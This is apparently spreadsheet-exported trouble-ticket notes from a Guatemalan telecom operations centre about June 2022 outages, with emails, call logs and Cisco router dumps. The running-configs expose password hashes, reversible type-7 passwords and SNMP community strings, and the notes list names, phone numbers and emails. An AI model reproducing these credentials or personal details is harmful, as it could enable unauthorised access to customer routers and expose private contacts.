ESTIMADO CLIENTE, LA VISITA TÉCNICA SERÁ NECESARIA PARA SOLVENTAR EL PROBLEMA. PODRÍAN VALIDARNOS LA INFORMACIÓN QUE MI COMPAÑERA SOLICITO EN EL CORREO ANTERIOR PARA NOSOTROS PODERLES INDICAR EL NOMBRE DE LOS TÉCNICOS  QUE ASISTIRÁN A SOLVENTAR EL PROBLEMA.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS.
MONICA YIREH CASTILLO POON
BUENOS DÍAS @SANDRA LUCIA VILORIO SANTOS
REFERENTE AL SEGUIMIENTO DE LA FALLA DEL SERVICIO DE E1, LE COMENTAMOS QUE ACTUALMENTE LO OBSERVAMOS ALARMADO POR LO QUE ES NECESARIO REALIZAR EL REINICIO DE LOS EQUIPOS EN SITIO PARA CONFIRMAR QUE ESTOS NO SE ENCUENTRAN INHIBIDOS. EN DADO CASO YA SE HAN REALIZADO LAS PRUEBAS Y EL SERVICIO NO RESTABLECE, SE ESTARÁ COORDINANDO PERSONAL TÉCNICO PARA REVISAR LOS EQUIPOS EL DÍA DE HOY, ÚNICAMENTE NECESITAMOS QUE NOS APOYEN CON BRINDARNOS LA SIGUIENTE INFORMACIÓN:
NOMBRE Y NÚMERO DE CONTACTO CON PERSONAL EN SITIO
HORARIO DE ATENCIÓN
DIRECCIÓN
CONFIRMACIÓN DE ALGÚN PERMISO/TRÁMITE PARA EL INGRESO A LAS INSTALACIONES.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS,</t>
  </si>
  <si>
    <t>SE LLAMA A LOS CONTACTOS BRINDADOS POR CC HN PERO NINGUNO RESPONDE
MANUEL LOPEZ
32545025
JMLOPEZ@TERMO.COM.SV
SANDRA VILORIO
22834570
3001486543
COLA:
NOMBRE: A: 0050432545025
NÚMERO: 0050432545025
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050432545025
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 16/06/2022 08:41:14
3001486713
COLA:
NOMBRE: A: 0050422834570
NÚMERO: 0050422834570
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050422834570
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 16/06/2022 08:41:18</t>
  </si>
  <si>
    <t>F4603389</t>
  </si>
  <si>
    <t>****---  SE ENVÍA CORREO A CL YA QUE CONFIRMA QUE EL SERVICIO ESTA ARRIBA POR LO QUE SE PIDE VALIDAR CIERRE Y SE INDICA QUE NO SE REALIZARON CORRECCIONES DE NUESTRO LADO --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 16 DE JUNIO DE 2022 01:09
PARA: ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ VAZQUEZ EDGAR JESUS &lt;EHVAZQUE@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4690063::: TICKET CNOC IMBBL004298 ::: FUERA DE SERVICIO
ESTIMADO SR. ESTRADA.
                DE NUESTRO LADO NO SE APLICÓ CORRECCIÓN Y TAMPOCO SE OBSERVARON EVENTOS A NIVEL DEL NODO, ADICIONAL NO SE OBTUVIERON CONTACTOS LOCALES PARA HACER PRUEBAS DE PRIMER NIVEL.
TOMANDO EN CUENTA LA OPERATIVIDAD PODRÍAMOS CERRAR NUESTRO TICKET,
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: ESTRADA BUSTOS VICTOR MANUEL [MAILTO:VEBUSTOS@UNINET.COM.MX]
ENVIADO EL: JUEVES, 16 DE JUNIO DE 2022 01:03
PARA: ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ VAZQUEZ EDGAR JESUS &lt;EHVAZQUE@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4690063::: TICKET CNOC IMBBL004298 ::: FUERA DE SERVICIO
EQUIPO,
SERVICIO ESTABLE POR FAVOR DE COMPARTIR ACTUALIZACIONES DE SU LADO, GRACIAS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001473033
**</t>
  </si>
  <si>
    <t>F4603448</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE  JARVI HERNANDEZ  52025829 NORESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001485665
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 8:44
PARA: ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; KHERNANDEZG@MP.GOB.GT &lt;KHERNANDEZG@MP.GOB.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: MINISTERIO PUBLICO
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JARVI HERNANDEZ 52025829 ENVIA DIRECTO A BUZON
-ID 3001487771</t>
  </si>
  <si>
    <t>F4603473</t>
  </si>
  <si>
    <t>SE PORCEDE A DEJAR EN MONITOREO PARA VALIDAR EL FINAL DE TURNO YA QUE SE TUVO ALARMA DE ENERGIA COMERCIAL HACE 4 MINUTOS
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 4 MINUTOS)
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.0(1)M4, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2010 BY CISCO SYSTEMS, INC.
COMPILED THU 28-OCT-10 16:26 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M9, RELEASE SOFTWARE (FC1)
CC_WALMART_GT_TIENDA_4161 UPTIME IS 4 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH0:C1900-UNIVERSALK9-MZ.SPA.150-1.M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50303DQ
2 GIGABIT ETHERNET INTERFACES
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
254464K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX150303DQ
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE          TECHNOLOGY-PACKAGE
              CURRENT       TYPE          NEXT REBOOT
-----------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT     IPBASEK9
SECURITY      NONE          NONE          NONE
DATA          NONE          NONE          NONE
CONFIGURATION REGISTER IS 0X2102
CC_WALMART_GT_TIENDA_4161#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2782 BYTES
!
VERSION 15.0
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_WALMART_GT_TIENDA_4161
!
BOOT-START-MARKER
BOOT-END-MARKER
!
ENABLE SECRET 5 $1$YDKN$VAN/.X/LHJMKIC4IWYTSN1
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6
!
NO IPV6 CEF
IP SOURCE-ROUTE
IP CEF
!
!
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX150303DQ
!
!
USERNAME GESTIONIP SECRET 5 $1$UMWJ$2DUDL0IFNOBEQJY8QD27C/
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.130.182 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.48.3.18 255.255.255.252
 IP FLOW INGRESS
 IP FLOW EGRESS
 RATE-LIMIT INPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF DEAD-INTERVAL 30
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN PRINCIPAL/_/344400106T/_/
 BANDWIDTH 3072
 NO IP ADDRESS
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
 ARP TIMEOUT 300
!
INTERFACE GIGABITETHERNET0/1.1
 DESCRIPTION WAN PRINCIPAL/_/344400106T/_/
 BANDWIDTH 3072
 ENCAPSULATION DOT1Q 1795
 IP ADDRESS 10.72.176.78 255.255.255.240
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 ARP TIMEOUT 300
!
ROUTER OSPF 1
 ROUTER-ID 10.72.176.78
 LOG-ADJACENCY-CHANGES
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 2 SUBNETS
 NETWORK 10.72.176.64 0.0.0.15 AREA 0
 NEIGHBOR 10.72.176.67
!
ROUTER OSPF 2
 LOG-ADJACENCY-CHANGES
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 1 METRIC 20 SUBNETS
 NETWORK 22.48.3.16 0.0.0.3 AREA 0
 DEFAULT-INFORMATION ORIGINATE
!
ROUTER RIP
 NETWORK 10.0.0.0
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP FLOW-TOP-TALKERS
 TOP 10
 SORT-BY BYTES
 CACHE-TIMEOUT 30
!
!
!
IP PREFIX-LIST DEFAULT SEQ 5 PERMIT 0.0.0.0/0
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY MON003444D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION DF MASAGUA FINCA RANCHO FLORIDO KM.70.5 CARR ANTIGUA A PUERTO SAN JOSE MASAGUA ESCUINTLA
!
CONTROL-PLANE
!
BRIDGE 1 PROTOCOL IEEE
BRIDGE 1 ROUTE IP
!
LINE CON 0
LINE AUX 0
LINE VTY 0 4
 PASSWORD 7 105A0C15020213
 LOGIN LOCAL
!
SCHEDULER ALLOCATE 20000 1000
END
CC_WALMART_GT_TIENDA_4161#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED,
                0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 16 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 16 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    LOGGING EXCEPTION SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 20 MESSAGE LINES LOGGED
LOG BUFFER (8192 BYTES):
*MAR  1 00:00:06.559: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JUN 16 06:09:14.803: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN 16 06:09:14.803: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 16 06:09:16.007: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN 16 06:09:16.007: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 16 00:09:16.871 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 06:09:16 UTC THU JUN 16 2022 TO 00:09:16 GUA THU JUN 16 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
*JUN 16 00:09:17.131 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUN 16 00:09:17.955 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUN 16 00:09:19.695 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.0(1)M4, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2010 BY CISCO SYSTEMS, INC.
COMPILED THU 28-OCT-10 16:26 BY PROD_REL_TEAM
*JUN 16 00:09:19.871 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_WALMART_GT_TIENDA_4161 IS UNDERGOING A COLD START
*JUN 16 00:09:20.491 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 16 00:09:22.491 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 16 00:09:50.811 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 16 00:09:51.811 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 16 00:10:11.615 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.176.65 ON GIGABITETHERNET0/1.1 FROM LOADING TO FULL, LOADING DONE
*JUN 16 00:10:20.683 GUA: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.53.39.67 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
CC_WALMART_GT_TIENDA_4161#
SHOW CLOCK
*00:13:08.039 GUA THU JUN 16 2022
CC_WALMART_GT_TIENDA_4161#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.176.65            0   DC99.147A.A231  ARPA   GIGABITETHERNET0/1.1
INTERNET  10.72.176.67            0   INCOMPLETE      ARPA
INTERNET  10.72.176.78            -   503D.E50C.A6C1  ARPA   GIGABITETHERNET0/1.1
INTERNET  22.48.3.17              2   E8B7.4849.B400  ARPA   GIGABITETHERNET0/0
INTERNET  22.48.3.18              -   503D.E50C.A6C0  ARPA   GIGABITETHERNET0/0
CC_WALMART_GT_TIENDA_4161#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0                          UP             UP       LAN DEL CLIENTE
GI0/1                          UP             UP       WAN PRINCIPAL/_/344400106T/_/
GI0/1.1                        UP             UP       WAN PRINCIPAL/_/344400106T/_/
LO5                            UP             UP       MONITOREO DEL CNOC
CC_WALMART_GT_TIENDA_4161#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0         22.48.3.18      YES NVRAM  UP                    UP
GIGABITETHERNET0/1         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/1.1       10.72.176.78    YES NVRAM  UP                    UP
LOOPBACK5                  10.212.130.182  YES NVRAM  UP                    UP
CC_WALMART_GT_TIENDA_4161#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN WALLMART 10.72.176.78
  PING 10.72.176.78: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.176.78 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.27
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALLMART 10.72.176.78
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALLMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.176.78/32  DIRECT  0    0                 0.0.0.0         VLANIF1795			
&lt;EESCGTESN1T1A03B02EIM3&gt;PIN -VPN-INSTANCE  WALLMART  10.72.176.78                 PING 10.72.176.78: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.72.176.78: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.72.176.78: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.72.176.78: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.72.176.78: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.72.176.78: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.72.176.78 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;EESCGTESN1T1A03B02EIM3&gt;
PE  10.179.28.27
&lt;EESCGTESN1T1A03B02EIM3&gt;DIS IP ROUTING-TABLE VPN-INSTANCE  WALLMART  10.72.176.78
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALLMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.176.78/32  DIRECT  0    0                 0.0.0.0         VLANIF1795
&lt;EESCGTESN1T1A03B02EIM3&gt;DIS CUR INTER  VLANIF1795
#
INTERFACE VLANIF1795
 DESCRIPTION WALLMART
 SET FLOW-STAT INTERVAL 30
 IP BINDING VPN-INSTANCE WALLMART
 IP ADDRESS 10.72.176.65 255.255.255.240
 ARP EXPIRE-TIME 300
 UNDO ICMP NAME NET-UNREACHABLE SEND
 UNDO ICMP NAME HOST-UNREACHABLE RECEIVE
 UNDO ICMP NAME PROTOCOL-UNREACHABLE RECEIVE
 UNDO ICMP NAME PORT-UNREACHABLE SEND
 PIM SM
 OSPF NETWORK-TYPE P2MP
 OSPF TIMER DEAD 60
 OSPF ENABLE 9 AREA 0.0.0.0
#
RETURN</t>
  </si>
  <si>
    <t>F4603480</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL CON PRUEBAS ---***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 16 DE JUNIO DE 2022 01:01
PARA: CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 18600017T ::: TICKET CNOC IMDHE020808 ::: "ENLACE FUERA DE SERVICIO"
BUENOS DÍAS ESTIMADO SR. CARRILLO.
                RESPECTO A SU SOLICITUD, SE CUENTA CON EL TICKET SD1135566 INGRESADO CON LA COLA ORIGINAL DE CORREO.
ADJUNTO CORREO DE RESPUESTA CON EL NÚMERO DE TICKET.
RESPECTO AL SEGUIMIENTO, EL PERSONAL A CARGO NOS INDICA QUE EL SERVICIO SE OBSERVA OPERATIVO Y SIN EVENTOS EN NUESTRA RED.
PING 187.128.59.98: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 187.128.59.98 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/12 MS
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4603518</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TUVO INTERRUPCION DE EENERGIA COMERCIAL SE PORCEDE CON CIERRE DE TTK
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 4 HORA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2094038 UPTIME IS 4 HOURS, 51 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 23:42:49 GMT WED JUN 15 2022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48234
1 DSL CONTROLLER
2 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 TERMINAL LINE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX16148234
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      SECURITYK9    PERMANENT      SECURITYK9
DATA          DATAK9        PERMANENT      DATAK9
CONFIGURATION REGISTER IS 0X2102
IP2094038#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4536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094038
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
LOGGING BUFFERED 16384
NO LOGGING CONSOLE
!
AAA NEW-MODEL
!
!
AAA AUTHENTICATION LOGIN DEFAULT GROUP TACACS+ LOCAL
AAA AUTHENTICATION LOGIN CON_ACC GROUP TACACS+ LOCAL NONE
AAA AUTHENTICATION ENABLE DEFAULT GROUP TACACS+ NON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
CLOCK TIMEZONE GMT -6 0
!
NO IPV6 CEF
NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
IP CEF
!
!
!
IP MULTICAST-ROUTING
!
!
NO IP BOOTP SERVER
NO IP DOMAIN LOOKUP
IP DOMAIN NAME TELECOM.COM.SV
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX16148234
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 09581D05175514405B5C5C
USERNAME ADMIN PRIVILEGE 15 SECRET 5 $1$36UD$EGPIKVWE9DVSMTHVY2DAU0
!
REDUNDANCY
!
!
!
!
CONTROLLER SHDSL 0/0/0
 DSL-GROUP 0 PAIRS  0
  SHDSL ANNEX A-B
  SHDSL RATE AUTO
 !
!
IP TCP SYNWAIT-TIME 10
IP FTP USERNAME TELECOM-USR
IP FTP PASSWORD 7 051F0303244F410454302420
!
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.0.236 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/IP2094038SV/_/
 BANDWIDTH 3072
 IP ADDRESS 10.152.245.83 255.255.255.248
 IP PIM SPARSE-MODE
 RATE-LIMIT INPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK NON-BROADCAST
 IP OSPF PRIORITY 0
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.96.0.78 255.255.255.252
 IP PIM SPARSE-MODE
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE ATM0/0/0
 NO IP ADDRESS
 SHUTDOWN
 NO ATM ILMI-KEEPALIVE
!
ROUTER OSPF 160
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC
 REDISTRIBUTE OSPF 1 SUBNETS
 NETWORK 10.152.245.80 0.0.0.7 AREA 0
 NEIGHBOR 10.152.245.81 PRIORITY 254
!
